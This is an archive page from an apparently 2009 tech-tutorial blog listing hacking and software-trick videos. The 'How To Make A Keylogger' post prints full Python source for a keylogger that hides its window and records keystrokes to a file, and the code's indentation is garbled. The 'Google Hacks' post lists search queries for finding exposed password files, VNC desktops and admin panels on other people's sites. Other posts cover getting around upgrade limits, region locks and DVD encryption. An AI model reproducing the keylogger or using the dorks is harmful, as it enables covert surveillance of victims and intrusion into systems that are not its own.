Tinkernut Labs



  • Windows 7 Upgrade Hacks

    November 11, 2009 // davisde // Hacks, Software Tips Tags: 7, beta, Hacks, install, microsoft, professional, tips, tricks, tutorial, ultimate, windows, work 9 Responses






    This video covers two hacks to get around Windows 7 upgrade limitations. One is a hack that lets you upgrade from the Windows 7 Release Candidate (Beta version) and the other hack allows you to upgrade to a downgraded Windows Edition (ex. Vista Ultimate to Windows 7 Professional).

  • How To Hack Bluetooth Headsets

    September 30, 2009 // davisde // DIY Projects, Hacks, Safety & Security Tags: bluetooth, cell, hack, hacking, mobile, sonar, tinkernut, tips, tricks, tutorial, wireless 9 Responses





    This video shows one of the vulnerabilities of some bluetooth headsets. To prevent this vulnerability, it’s best to invest a little more money into a more secure headset and making sure your headset is turned off when not in use. You can find all of the links and scripts used in this video, as well as find answers to questions you may have at the link below:

    http://www.tinkernut.com/groups/videotutorial-extras/forum/topic/how-to-hack-bluetooth-headsets/

  • Convert DVD’s to iPod for free

    September 30, 2009 // davisde // DIY Projects, Hacks, Multimedia Tips, Software Tips Tags: convert, dvd, free, freeware, hack, ipod, media, movies, player, portable, software, tips, tricks, tutorial, Video 6 Responses




    This video will show you some free programs to use for converting DVD’s to play on iPod’s or other portable media devices. For all the links used in this video, as well as alternatives for Mac users, please refer to the link below:

    This video will show you some free programs to use for converting DVD’s to play on iPod’s or other portable media devices. You can find the links to the software used in the video below:

     

    DVD Fab (free) -http://www.dvdfab.com/free.htm

    Handbrake (free) – http://handbrake.fr/?article=download

    iTunes (free) – http://www.apple.com/itunes/download/

     

    FOR MAC USERS: As I do not have a Mac, I cannot test this method, but a free program to remove dvd encryption is MacTheRipper. Once it has ripped the DVD to your computer, you can then use Handbrake to convert it as shown in the video.

  • Two Cool Hulu Tricks

    September 30, 2009 // davisde // Cool Websites, Hacks, Multimedia Tips, Web Tips Tags: anywhere, download, Hacks, hulu, ip, online, proxy, tips, tricks, tutorial, Video 6 Responses





    This video covers two programs, IP Hider (free trial) and Hulu Video Downloader (freeware). IP Hider allows you to access Hulu from anywhere in the world and Hulu Video Downloader allows you to download Hulu programming to your computer. Hulu Video Downloader is only available in the US.

    IP Hider – http://www.allanonymity.com/ip-hider-hide-ip-software
    Hulu Video Downloader – http://www.downloadtoolz.com/hulu/

  • Google Hacks

    September 30, 2009 // davisde // Hacks, Safety & Security, Web Tips Tags: 2.0, control, engine, google, hack, Hacks, instructional, passwords, php, search, tinkernut, tutorial, website 15 Responses






    This tutorial shows you security issues with Google that can allow you to hack other people’s sites. Use this video to make sure your site is secure.

    PAGES THAT CAN’T BE SEARCHED
    “robots.txt” “disallow:” filetype:txt

    FTP PASSWORD HASHES
    intitle:index of ws_ftp.ini

    intitle:”index of” passwd passwd.bak

    FRONT PAGE HACK
    inurl:_vti_pvt “service.pwd”

    PHP PHOTO ALBUMS
    inurl:”phphotoalbum/upload”

    VNC HACK
    “vnc desktop” inurl:5800 ….all the way up to 5806

    PRINTER CONTROL PANELS
    intext”UAA(MSB)” Lexmark -ext:pdf

    inurl:”port_255″ -htm

    PHP ADMINS
    intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”

  • How To Make A Keylogger

    September 11, 2009 // davisde // Hacks, Programming Tips Tags: computer, hack, hacking, keyboard, keylogger, programming, python, scripts, tinkernut, tips, tricks, tutorial 38 Responses


    KEYLOGGER SOURCECODE AND

    – Download Python: http://www.python.org/

    – Download Pyhook: pyhook.sourceforge.net

    – Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/

    SOURCE:

    import win32api
    import win32console
    import win32gui
    
    import pythoncom, pyHook
    
    win = win32console.GetConsoleWindow()
    win32gui.ShowWindow(win,0)
    
    def OnKeyboardEvent(event):
     if event.Ascii==5:
            
    _exit(1)
    
     if event.Ascii != 0 or 8:
     f=open('c:output.txt','r')
           
     buffer=f.read()
     f.close()
            
    f=open('c:output.txt','w')
     keylogs=chr(event.Ascii)
           
     if event.Ascii==13:
     keylogs='/n'
     buffer += 
    keylogs
     f.write(buffer)
     f.close()
    
    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()
  • Hacking Tip: Change Your MAC Address

    September 4, 2009 // davisde // Hacks Tags: address, block, bypass, change, game, hack, hacking, hide, ip, mac, sites, tips, tricks, tutorial, website 3 Responses





    This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip

  • Howcast & Tinkernut: How To Dust For Fingerprints

    June 11, 2009 // davisde // DIY Projects, Hacks, Multimedia Tips, Video Tags: diy, forensics, Howcast & Tinkernut, projects, science, tips, tricks, tutorial 1 Response



    How To Dust For Fingerprints on Howcast

    This is a tutorial I made for Howcast.com. It shows how to dust for fingerprints using household items.

  • Cool Wiimote Tricks Using A PC

    June 5, 2009 // davisde // Gaming, Hacks, Video Tags: computer, hack, mouse, pc, reality, remote, screen, tips, touch, touchscreen, tricks, tutorial, virtual, wii 7 Responses


    This video shows you how to connect a Wii remote to a PC and some different tips and tricks you can do with it. For all links and websites used in the video, please visit the URL below:

  • How To Play Console Games On Your PC

    May 29, 2009 // davisde // Gaming, Hacks, Video Tags: emulator, Gaming, hack, mario, nintendo, pc, tips, tricks, tutorial, wii, xbox 15 Responses


    This video shows you methods for emulating some of the major console games on your PC, such as Atari, NES, PS2, Xbox, N64 and Wii. For questions, comments and all of the links used in this video, please visit the forum link below.

← Older posts
Newer posts →